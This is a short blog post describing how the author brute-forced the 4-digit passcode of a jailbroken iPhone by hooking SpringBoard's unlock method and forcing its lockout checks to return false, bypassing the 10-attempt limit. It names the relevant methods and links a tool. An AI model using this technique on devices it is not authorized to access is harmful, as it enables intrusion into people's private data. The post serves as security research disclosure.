Sign in Subscribe
By Majd Alfhaily in News

Cracking Apple's 4-digit iOS Passcode

You must have read about MDSec's Black Box that manages to gain access to iPhones running up to iOS 8.1 by brute-forcing the passcode over a USB connection to simulate keypad entry. These kind of attacks are not very practical because iOS's protection against bruteforce attacks blocks passcode entry after 10 failed attempts.

I tried to replicate the attack while covering the entire process without using hardware hacks, so the device has to be jailbroken to gain unsigned code execution privilege (or you might as well use your own exploit for that ;p).

I wrote the following code that loops through every possible 4-digit passcode, starting from 0000 up to 9999.

When I made a class-dump of the SpringBoard process, I found a class called SBDeviceLockController with an interesting method:

- (BOOL)attemptDeviceUnlockWithPassword:(NSString *)password
                           appRequested:(BOOL)requested;

After that, I wrote a dynamic library that hooks into the SpringBoard process and runs the above code when SpringBoard finished launching. It follows up by calling the method above for possible 4-digit combination.

Once it returns a Boolean value of true, we can assure that it's the working pin.

I relaunched the SpringBoard process to test my code at runtime, and as expected it worked. Well, for the most part... When watching syslog, I found that it's only running the first 10 passcode entry attempts then it's getting blocked by the operating system and throwing an iPhone is Disabled alert on the lock-screen. I had to find a workaround.

I looked back at the earlier class-dump of the same class above (SBFDeviceLockController) and found those related methods:

- (BOOL)_temporarilyBlocked;
- (BOOL)isPasscodeLockedOrBlocked;
- (BOOL)isBlocked;

I hooked those class methods to return a value of false. When I proceeded to run the code again, the device no longer disables passcode entry after 10 failed attempts. The code is now able to try a 4-digit passcode combination every 5 seconds. This translates to a max runtime of 14 hours for every single pin combination possible.

You can find libTransLock on my GitHub.

Subscribe to Majd Alfhaily

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
[email protected]
Subscribe